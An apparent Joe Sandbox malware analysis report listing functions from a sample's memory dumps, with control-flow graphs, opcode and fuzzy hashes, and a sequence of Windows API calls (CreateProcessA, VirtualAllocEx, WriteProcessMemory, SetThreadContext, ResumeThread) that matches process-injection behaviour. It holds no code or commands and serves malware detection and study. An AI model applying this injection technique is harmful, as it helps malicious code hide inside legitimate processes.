                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F0C0C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$ProcessThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2063062207-0
                                                                                                    • Opcode ID: b0e1b32c8c2fb5930ade68f7afd8d881ff85ab54e4b8ddb17755b028cd6b34fe
                                                                                                    • Instruction ID: 6090b3a8fb0a59734020802144e7ad2ef1e81d990a52d64f3fee1b384fa081e3
                                                                                                    • Opcode Fuzzy Hash: b0e1b32c8c2fb5930ade68f7afd8d881ff85ab54e4b8ddb17755b028cd6b34fe
                                                                                                    • Instruction Fuzzy Hash: 165146B0900649CFDB10CFAAC588BDEBBF5FF88314F24856AE509B3290C7786844CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 38 707736c-707740d 40 7077446-7077466 38->40 41 707740f-7077419 38->41 46 707749f-70774ce 40->46 47 7077468-7077472 40->47 41->40 42 707741b-707741d 41->42 44 7077440-7077443 42->44 45 707741f-7077429 42->45 44->40 48 707742d-707743c 45->48 49 707742b 45->49 55 7077507-70775c1 CreateProcessA 46->55 56 70774d0-70774da 46->56 47->46 51 7077474-7077476 47->51 48->48 50 707743e 48->50 49->48 50->44 52 7077499-707749c 51->52 53 7077478-7077482 51->53 52->46 57 7077486-7077495 53->57 58 7077484 53->58 69 70775c3-70775c9 55->69 70 70775ca-7077650 55->70 56->55 59 70774dc-70774de 56->59 57->57 60 7077497 57->60 58->57 61 7077501-7077504 59->61 62 70774e0-70774ea 59->62 60->52 61->55 64 70774ee-70774fd 62->64 65 70774ec 62->65 64->64 66 70774ff 64->66 65->64 66->61 69->70 80 7077652-7077656 70->80 81 7077660-7077664 70->81 80->81 82 7077658 80->82 83 7077666-707766a 81->83 84 7077674-7077678 81->84 82->81 83->84 85 707766c 83->85 86 707767a-707767e 84->86 87 7077688-707768c 84->87 85->84 86->87 90 7077680 86->90 88 707769e-70776a5 87->88 89 707768e-7077694 87->89 91 70776a7-70776b6 88->91 92 70776bc 88->92 89->88 90->87 91->92 94 70776bd 92->94 94->94
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070775AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 98ddef436a186a2087115a56e0b1a6504555f4726869669e156f70f54aa4d533
                                                                                                    • Instruction ID: c39ac411a2ffa171c4aa5fb1c17c8b55bbe66f9061c6fb9f46a2dd0eab80a901
                                                                                                    • Opcode Fuzzy Hash: 98ddef436a186a2087115a56e0b1a6504555f4726869669e156f70f54aa4d533
                                                                                                    • Instruction Fuzzy Hash: BCA16AB1D0021ADFDF50CFA8C841BEDBBB2BF44354F1486A9D808A7280DB749985CF96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 95 7077378-707740d 97 7077446-7077466 95->97 98 707740f-7077419 95->98 103 707749f-70774ce 97->103 104 7077468-7077472 97->104 98->97 99 707741b-707741d 98->99 101 7077440-7077443 99->101 102 707741f-7077429 99->102 101->97 105 707742d-707743c 102->105 106 707742b 102->106 112 7077507-70775c1 CreateProcessA 103->112 113 70774d0-70774da 103->113 104->103 108 7077474-7077476 104->108 105->105 107 707743e 105->107 106->105 107->101 109 7077499-707749c 108->109 110 7077478-7077482 108->110 109->103 114 7077486-7077495 110->114 115 7077484 110->115 126 70775c3-70775c9 112->126 127 70775ca-7077650 112->127 113->112 116 70774dc-70774de 113->116 114->114 117 7077497 114->117 115->114 118 7077501-7077504 116->118 119 70774e0-70774ea 116->119 117->109 118->112 121 70774ee-70774fd 119->121 122 70774ec 119->122 121->121 123 70774ff 121->123 122->121 123->118 126->127 137 7077652-7077656 127->137 138 7077660-7077664 127->138 137->138 139 7077658 137->139 140 7077666-707766a 138->140 141 7077674-7077678 138->141 139->138 140->141 142 707766c 140->142 143 707767a-707767e 141->143 144 7077688-707768c 141->144 142->141 143->144 147 7077680 143->147 145 707769e-70776a5 144->145 146 707768e-7077694 144->146 148 70776a7-70776b6 145->148 149 70776bc 145->149 146->145 147->144 148->149 151 70776bd 149->151 151->151
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070775AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: ba460707629e5fd60a37ba06ac21dbdc64d89f26d73d094f4894412c7d92e4a2
                                                                                                    • Instruction ID: 7c82848dbba4ce82c21b75f5b0437faee338785580383bf49d9566004d0d7cf5
                                                                                                    • Opcode Fuzzy Hash: ba460707629e5fd60a37ba06ac21dbdc64d89f26d73d094f4894412c7d92e4a2
                                                                                                    • Instruction Fuzzy Hash: FB915BB1D0021ADFDF50CFA8C841BEEBBB6BF44354F148669D809A7240DB749985CF96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 152 f09c90-f09ca5 call f07974 155 f09ca7 152->155 156 f09cbb-f09cbf 152->156 205 f09cad call f09f17 155->205 206 f09cad call f09f18 155->206 157 f09cc1-f09ccb 156->157 158 f09cd3-f09d14 156->158 157->158 163 f09d21-f09d2f 158->163 164 f09d16-f09d1e 158->164 159 f09cb3-f09cb5 159->156 161 f09df0-f09eb0 159->161 200 f09eb2-f09eb5 161->200 201 f09eb8-f09ee3 GetModuleHandleW 161->201 166 f09d31-f09d36 163->166 167 f09d53-f09d55 163->167 164->163 168 f09d41 166->168 169 f09d38-f09d3f call f08fa8 166->169 170 f09d58-f09d5f 167->170 173 f09d43-f09d51 168->173 169->173 174 f09d61-f09d69 170->174 175 f09d6c-f09d73 170->175 173->170 174->175 176 f09d80-f09d89 call f08fb8 175->176 177 f09d75-f09d7d 175->177 182 f09d96-f09d9b 176->182 183 f09d8b-f09d93 176->183 177->176 185 f09db9-f09dc6 182->185 186 f09d9d-f09da4 182->186 183->182 193 f09dc8-f09de6 185->193 194 f09de9-f09def 185->194 186->185 187 f09da6-f09db6 call f08fc8 call f08fd8 186->187 187->185 193->194 200->201 202 f09ee5-f09eeb 201->202 203 f09eec-f09f00 201->203 202->203 205->159 206->159
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00F09ED6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 5c0624360af67a04d29ff286a889805b613b03feb57af556e2a7e7a8cfddf8d4
                                                                                                    • Instruction ID: 10e335495d86ebc9af1ff02e9bf5168153a5bd96a6df7439b88f7b1843053b74
                                                                                                    • Opcode Fuzzy Hash: 5c0624360af67a04d29ff286a889805b613b03feb57af556e2a7e7a8cfddf8d4
                                                                                                    • Instruction Fuzzy Hash: DD713470A01B058FDB24DF6AD44179ABBF5FF88314F008929D48AD7A81E774E846EB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 207 f03e20-f05509 CreateActCtxA 210 f05512-f0556c 207->210 211 f0550b-f05511 207->211 218 f0557b-f0557f 210->218 219 f0556e-f05571 210->219 211->210 220 f05590 218->220 221 f05581-f0558d 218->221 219->218 223 f05591 220->223 221->220 223->223
                                                                                                    APIs
                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00F054F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 4f340c22ba9a0016579d27d030902b70e9f561a6b7744c9912f34d47186686bc
                                                                                                    • Instruction ID: a51b08021df69d288910cb49fa4358191721979aa8f7ed65959098e4461cc850
                                                                                                    • Opcode Fuzzy Hash: 4f340c22ba9a0016579d27d030902b70e9f561a6b7744c9912f34d47186686bc
                                                                                                    • Instruction Fuzzy Hash: FB4105B1D0061CCBDF24CFA9C844BDEBBB6BF48708F148469D409AB251D7B56946DF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 224 f05447-f05509 CreateActCtxA 226 f05512-f0556c 224->226 227 f0550b-f05511 224->227 234 f0557b-f0557f 226->234 235 f0556e-f05571 226->235 227->226 236 f05590 234->236 237 f05581-f0558d 234->237 235->234 239 f05591 236->239 237->236 239->239
                                                                                                    APIs
                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00F054F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 534d467adb41a62bc875ed33a2b6451f7af6077d9eec5906f425f1e2038b8faa
                                                                                                    • Instruction ID: a9f0ac01297798acb36f397e9ff8cd7e060b1beb32f4f88c95d5e4a5c8a4e512
                                                                                                    • Opcode Fuzzy Hash: 534d467adb41a62bc875ed33a2b6451f7af6077d9eec5906f425f1e2038b8faa
                                                                                                    • Instruction Fuzzy Hash: 0041E4B1C00619CBDF24CFA9C844BDEBBB6BF88708F14846AD409AB251DBB55946DF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 240 70770e8-707713e 242 7077140-707714c 240->242 243 707714e-707718d WriteProcessMemory 240->243 242->243 245 7077196-70771c6 243->245 246 707718f-7077195 243->246 246->245
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07077180
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 8abd37e7df9953fc731feb7287bc83cd8d7fe03d4edcedd4dc6d4b35c5bcf23b
                                                                                                    • Instruction ID: 9f9b78a14ed16d55b001305004a631eba2e253bb8a71984d01c42d08725adbbd
                                                                                                    • Opcode Fuzzy Hash: 8abd37e7df9953fc731feb7287bc83cd8d7fe03d4edcedd4dc6d4b35c5bcf23b
                                                                                                    • Instruction Fuzzy Hash: 632126B59003599FCF10CFA9C8817DEBBF5BF48314F14892AE958A7240C7789945CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 250 7076f53-7076f54 251 7076f46-7076f50 250->251 252 7076f56-7076fa3 250->252 251->250 254 7076fa5-7076fb1 252->254 255 7076fb3-7076fb6 252->255 254->255 256 7076fbd-7076fe3 SetThreadContext 255->256 257 7076fe5-7076feb 256->257 258 7076fec-707701c 256->258 257->258
                                                                                                    APIs
                                                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 07076FD6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1591575202-0
                                                                                                    • Opcode ID: 659dd167762c863771728827b97771011970ef51639dff0d1efba170e0de668d
                                                                                                    • Instruction ID: d5f8da12d4456997c1422eea344b1d9a2f00cad5adb0962212dac3698f248109
                                                                                                    • Opcode Fuzzy Hash: 659dd167762c863771728827b97771011970ef51639dff0d1efba170e0de668d
                                                                                                    • Instruction Fuzzy Hash: 812159B2D003498FCB10CFA9C5857EEBBF4AF98314F14842AD559B7240C7789944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 262 70770f0-707713e 264 7077140-707714c 262->264 265 707714e-707718d WriteProcessMemory 262->265 264->265 267 7077196-70771c6 265->267 268 707718f-7077195 265->268 268->267
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07077180
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 81c254db6a2c95404bbadc56af9c61f7b895e0e589e5cfb5ca627b3eb6aea57a
                                                                                                    • Instruction ID: b240def26fa331c2e72e2c684f3b19f800512600dca4b4c852ad4574e15df197
                                                                                                    • Opcode Fuzzy Hash: 81c254db6a2c95404bbadc56af9c61f7b895e0e589e5cfb5ca627b3eb6aea57a
                                                                                                    • Instruction Fuzzy Hash: 142104B19002599FCF10CFA9C884BDEBBF5BF88314F14882AE918A7240C7789944CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 272 f0c1b0-f0c24c DuplicateHandle 273 f0c255-f0c272 272->273 274 f0c24e-f0c254 272->274 274->273
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F0C23F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: 643319db466be8392ad067cd189b9a9bf30e683e8ef724373006be151ed3dd35
                                                                                                    • Instruction ID: b7da92f1791320820b36dbfb0208c9ed64560328a2eab3bc6a63a225965c9ad9
                                                                                                    • Opcode Fuzzy Hash: 643319db466be8392ad067cd189b9a9bf30e683e8ef724373006be151ed3dd35
                                                                                                    • Instruction Fuzzy Hash: 4621F2B59002099FDF10CFA9D484ADEBBF8EF48320F14842AE914A7350D378A945CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 277 7076f58-7076fa3 279 7076fa5-7076fb1 277->279 280 7076fb3-7076fe3 SetThreadContext 277->280 279->280 282 7076fe5-7076feb 280->282 283 7076fec-707701c 280->283 282->283
                                                                                                    APIs
                                                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 07076FD6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1591575202-0
                                                                                                    • Opcode ID: 178d1a612a820bac14a4cf0e6a4ba93ea20c32add92a6c6ff152fc9e5445202c
                                                                                                    • Instruction ID: 062e5a3397e9f520da41c652ca873174ac6949fbf71276178ab974fdc841b9a6
                                                                                                    • Opcode Fuzzy Hash: 178d1a612a820bac14a4cf0e6a4ba93ea20c32add92a6c6ff152fc9e5445202c
                                                                                                    • Instruction Fuzzy Hash: C42138B1D002098FCB10CFA9C4847EEBBF4EF88324F14842AE519A7240CB79A945CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 287 70771e0-707726d ReadProcessMemory 290 7077276-70772a6 287->290 291 707726f-7077275 287->291 291->290
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07077260
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: c95b77bc4efff4febe439c5d48f465a7457e0990466d3b2240d26542c0d9f7f8
                                                                                                    • Instruction ID: 4a9810223f5557f9ec34126de4ba6d67057165865fe65df50c4c2efce4831598
                                                                                                    • Opcode Fuzzy Hash: c95b77bc4efff4febe439c5d48f465a7457e0990466d3b2240d26542c0d9f7f8
                                                                                                    • Instruction Fuzzy Hash: 6B212AB1C002599FCF10CFA9C844ADEBBF5FF88314F14882AE518A7240C7749945CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 300 70771d8-707726d ReadProcessMemory 303 7077276-70772a6 300->303 304 707726f-7077275 300->304 304->303
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07077260
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 7e181d1105dfc4f20711df9377bc291002eb491df8ad00f94470148e388eee19
                                                                                                    • Instruction ID: 5055b9f89712dd73fecd1a57b4110e71bfc69c248b13e1349cbead434f7f5c2f
                                                                                                    • Opcode Fuzzy Hash: 7e181d1105dfc4f20711df9377bc291002eb491df8ad00f94470148e388eee19
                                                                                                    • Instruction Fuzzy Hash: DD2116B1C002599FCF00CFA9C985BEEBBF5FF48314F14882AE919A7240D7789945CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 295 f0c1b8-f0c24c DuplicateHandle 296 f0c255-f0c272 295->296 297 f0c24e-f0c254 295->297 297->296
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F0C23F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: 79f492e42cbdabeb0c62e2f92e3f02831befe13fd22974be8d1ab6fb4dbbb49a
                                                                                                    • Instruction ID: 0df5833277ed6a25e893fffda6599ea72b57692dd05bbba2c6f56584ea263b1e
                                                                                                    • Opcode Fuzzy Hash: 79f492e42cbdabeb0c62e2f92e3f02831befe13fd22974be8d1ab6fb4dbbb49a
                                                                                                    • Instruction Fuzzy Hash: 6621E3B59002499FDF10CFA9D584ADEBBF8EF48324F14841AE914B3350D374A954DFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0707709E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: ea471a79638062e89d0362407e99440f2a1b1a3cb7cb9a684a191d86144264e8
                                                                                                    • Instruction ID: dc3e02f35471ef5d8172ad7c89243d5a23d1060bdd9d1f529065a7164c5ed6b1
                                                                                                    • Opcode Fuzzy Hash: ea471a79638062e89d0362407e99440f2a1b1a3cb7cb9a684a191d86144264e8
                                                                                                    • Instruction Fuzzy Hash: 482158B1800349CFCF11CFA5C854BDEBFF5AF88314F18886AE555A7661C7399944CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F09F51,00000800,00000000,00000000), ref: 00F0A162
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: 71bc83ee876cb6d7374df6cbe4932b480dce84eaeee8ee986406d61e22f711c7
                                                                                                    • Instruction ID: 78cbb99b67c0b2db2af9d5e7d600a03639eb862fcddc6243df1c37cf52a9625a
                                                                                                    • Opcode Fuzzy Hash: 71bc83ee876cb6d7374df6cbe4932b480dce84eaeee8ee986406d61e22f711c7
                                                                                                    • Instruction Fuzzy Hash: 111114B6D003499FDB10CFAAC844ADEFBF4EB88324F14842AE515B7640C379A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0707709E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 2880dc5d8aa032fcfb83c40a9eefccde8ee55a1ba7c028234580d02be147a13c
                                                                                                    • Instruction ID: 619bb80677515f96ea8ed76dc95b67eb4b1bf9fb7b1d877eb93097d15439d424
                                                                                                    • Opcode Fuzzy Hash: 2880dc5d8aa032fcfb83c40a9eefccde8ee55a1ba7c028234580d02be147a13c
                                                                                                    • Instruction Fuzzy Hash: CF1126719002499FCF10DFA9C844BDFBBF9AF88324F148819E515A7250C7759944CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 4e4c27d70b7ac1da4062f8c374a561f6c1a2334ceb53575ec182bc2a4c00b740
                                                                                                    • Instruction ID: fe14038f832bce4239fd43f043c6d1e74ba9e75928252eeae3f4a9a64f979ace
                                                                                                    • Opcode Fuzzy Hash: 4e4c27d70b7ac1da4062f8c374a561f6c1a2334ceb53575ec182bc2a4c00b740
                                                                                                    • Instruction Fuzzy Hash: 8C1116B1D002498BDB10DFA9C4447EEBBF9EF88224F14882AD515B7240C775A944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F09F51,00000800,00000000,00000000), ref: 00F0A162
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: ad716f07c3a3c44b1bd21728067d9fd2aee6788d52710afc613c80c5886d6b41
                                                                                                    • Instruction ID: b555fed54eaf6750cf070da3f4c1e4ed81dbe237283a9aa86cf692a908ff1e6e
                                                                                                    • Opcode Fuzzy Hash: ad716f07c3a3c44b1bd21728067d9fd2aee6788d52710afc613c80c5886d6b41
                                                                                                    • Instruction Fuzzy Hash: 931112B6D00349CFCB10CFA9D444ADEFBF4BB88324F14842AD515A7640C378A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 168463ced43ace6c72c4c6ab17abd12a2b5f8a1edd5c2c31f31fe9d987162388
                                                                                                    • Instruction ID: 26f3dd965c0cbc115530f816fe9d411812b47ce4902afaf11afdddcc7d5c2f4c
                                                                                                    • Opcode Fuzzy Hash: 168463ced43ace6c72c4c6ab17abd12a2b5f8a1edd5c2c31f31fe9d987162388
                                                                                                    • Instruction Fuzzy Hash: 511125B1D002498FCB10DFAAC4447EEFBF9AF88224F14882AD519A7240C779A944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00F09ED6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 904db4b9bd6731a2654996861afe7e27c94c4732da52a132157ba4eaf48d6e26
                                                                                                    • Instruction ID: d86c135e5ba71d7875c8014229d04279907bd9cdb15bf331780decfbaefc8527
                                                                                                    • Opcode Fuzzy Hash: 904db4b9bd6731a2654996861afe7e27c94c4732da52a132157ba4eaf48d6e26
